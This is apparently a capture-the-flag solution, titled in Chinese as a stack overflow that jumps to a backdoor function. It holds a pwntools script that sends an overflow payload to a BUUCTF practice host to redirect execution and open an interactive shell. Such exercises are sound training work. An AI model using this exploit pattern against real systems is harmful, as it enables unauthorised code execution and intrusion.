栈溢出直接利用后门函数
from pwn import * r=remote('node3.buuoj.cn',27794) payload='a'*0x10+'b'*0x8+p64(0x4006e6) r.recvuntil('Please input the length of your name:') r.sendline(str(len(payload))) r.recvuntil("What's u name?") r.sendline(payload) r.interactive()